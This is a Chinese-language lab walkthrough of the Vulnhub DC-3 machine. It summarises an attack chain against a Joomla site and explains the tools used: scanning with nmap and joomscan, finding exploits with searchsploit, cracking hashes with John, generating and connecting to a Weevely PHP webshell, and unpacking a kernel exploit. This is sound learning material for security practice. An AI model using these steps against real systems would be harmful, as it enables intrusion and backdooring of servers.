Vulnhub——DC-3渗透
一、涉及漏洞类型
CMS漏洞
SQL注入漏洞
文件上传漏洞
二、渗透思路
主机发现 => 端口扫描 => 访问web服务 => 判断cms => 敏感信息泄露找到版本号 => 查找已知漏洞 => sql注入拿后台账户密码 => john破解密文 => 后台文件上传getshell => 内核漏洞提权 => 找到最终flag
三、学到知识点
1.arp-scan
arp-scan是一个用来进来系统发现和指纹识别的命令行工具。它可以构建并发送ARP请求到指定的IP地址,并且显示返回的任何响应。
sudo arp-scan -l
使用该命令可以查看当前网络中所有设备IP, MAC地址及制造商信息。
2.nmap
nmap提供了四项基本功能(主机发现、端口扫描、服务与版本侦测、OS侦测)及丰富的脚本库。
nmap -sV -p- 192.168.175.137
对192.168.175.137主机进行服务与版本侦测
3.Joomla
Joomla!是一套全球知名的内容管理系统。Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统,最新版本是3.9.27。
4.nikto
Nikto是一款开源的(GPL)网页服务器扫描器,它可以对网页服务器进行全面的多种扫描,包含超过3300种有潜在危险的文件/CGIs。
nikto -h 192.168.175.137
对192.168.175.137主机进行普通扫描
5.joomscan
漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。
joomscan --url http://192.168.175.137
对http://192.168.175.137站点执行默认检测。
6.searchsploit
是一个用于Exploit-DB的命令行搜索工具,可以帮助我们查找渗透模块。
searchsploit joomla 3.7.0
该命令可以搜索到 标题和路径中包含“joomla 3.7.0”的所有内容
7.find
linux中find命令是系统中查找文件的命令,可以帮助用户快速找出自己所需要的文件。
find / -name "42033.txt"
在根目录下查找名字为42033.txt的文件的位置。
8.John
John the Ripper免费的开源软件,是一个快速的密码破解工具,用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如DES、MD4、MD5等。
john adminhash.txt --show
对adminhash.txt进行爆破
9.Weevely
Weevely 是使用python编写的一个用来生成并管理php webshell的安全测试工具
weevely generate 123456 webshell.php
生成一个名字为webshell,密码为123456的后门文件。
weevely http://192.168.175.137/templates/beez3/shell.php 123456
链接植入后门的主机
9.
lsb_release -a
查看一下内核版本
10.
echo $PATH
显示当前PATH环境变量,该变量的值由一系列以冒号分隔的目录名组成
11.
unzip 39772\ .zip
解压zip文件到当前目录
12.tar
tar(tar只是打包,如果只打包不压缩那么文件的大小并不会改变) tar[必选参数][选择参数][文件]
-xvf exploit.tar
x解压 v显示所有过程 f必须加
四、参考
https://www.cnblogs.com/chenk0/articles/15550146.html